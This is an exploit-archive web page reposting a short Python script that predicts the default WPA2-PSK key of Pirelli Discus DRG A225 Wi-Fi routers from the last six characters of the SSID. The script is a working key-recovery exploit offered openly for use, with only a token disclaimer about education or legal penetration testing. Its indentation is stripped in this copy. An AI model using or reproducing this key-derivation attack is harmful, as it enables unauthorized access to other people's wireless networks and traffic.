首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit
来源:http://www.remote-exploit.org 作者:j0rgan 发布时间:2009-04-07  
#!/usr/bin/python
#
# Pirelli Discus DRG A225 WiFi router
# Default WPA2-PSK algorithm vulnerability
#
# paper: http://milw0rm.com/papers/313
#
# With this code we can predict the WPA2-PSK key...
#
# Hacked up by Muris Kurgas aka j0rgan
#            j0rgan (-@-) remote-exploit.org
#        http://www.remote-exploit.org
#
# Use for education or legal penetration testing purposes.....

import sys

def hex2dec(s):
return int(s, 16)

if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
print "\r\nEnter the last 6 chars from Discus SSID"
print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
exit()
const = hex2dec('D0EC31')
inp = hex2dec(sys.argv[1])
result = (inp - const)/4

print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·UltraISO <= 9.3.3.2685 .ui Off
·Unsniff Network Analyzer 1.0 (
·iDB 0.2.5pa SVN 243 (skin) Loc
·Baby FTP server version 1.x re
·Mozilla Firefox XSL Parsing Re
·Family Connections CMS <= 1.8.
·XBMC 8.10 GET Request Remote B
·Lanius CMS <= 0.5.2 Remote Arb
·Amaya 11.1 XHTML Parser Remote
·XBMC 8.10 (HEAD) Remote Buffer
·AdaptBB 1.0 (topic_id) SQL Inj
·SASPCMS 0.9 Multiple Remote Vu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved